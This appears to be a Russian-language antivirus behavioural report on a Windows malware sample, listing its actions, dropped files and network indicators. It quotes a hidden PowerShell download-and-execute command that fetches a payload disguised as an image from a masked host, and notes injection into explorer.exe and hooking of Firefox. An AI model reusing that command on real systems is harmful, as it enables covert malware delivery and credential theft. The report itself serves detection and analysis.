Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://cr##trt.com/i7/bin.jpg как %temp+%\taske.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/bin.jpg',$env:Temp+'\taske.exe');(New-Object -com Shell.Applic...
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
Перехватывает функции
в браузерах
- Процесс firefox.exe, модуль nss3.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\taske.exe
Удаляет следующие файлы
- %TEMP%\taske.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://cr##trt.com/i7/bin.jpg
UDP
- DNS ASK cr##trt.com
- DNS ASK ai##m.info
- DNS ASK ky###ebird.com
- DNS ASK 0l###otake.men
Другое
Создает и запускает на исполнение
- '%TEMP%\taske.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/bin.jpg',$env:Temp+'\taske.exe');(New-Object -com Shell.Applic...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\napstat.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\taske.exe"
- '%ProgramFiles(x86)%\mozilla firefox\firefox.exe'
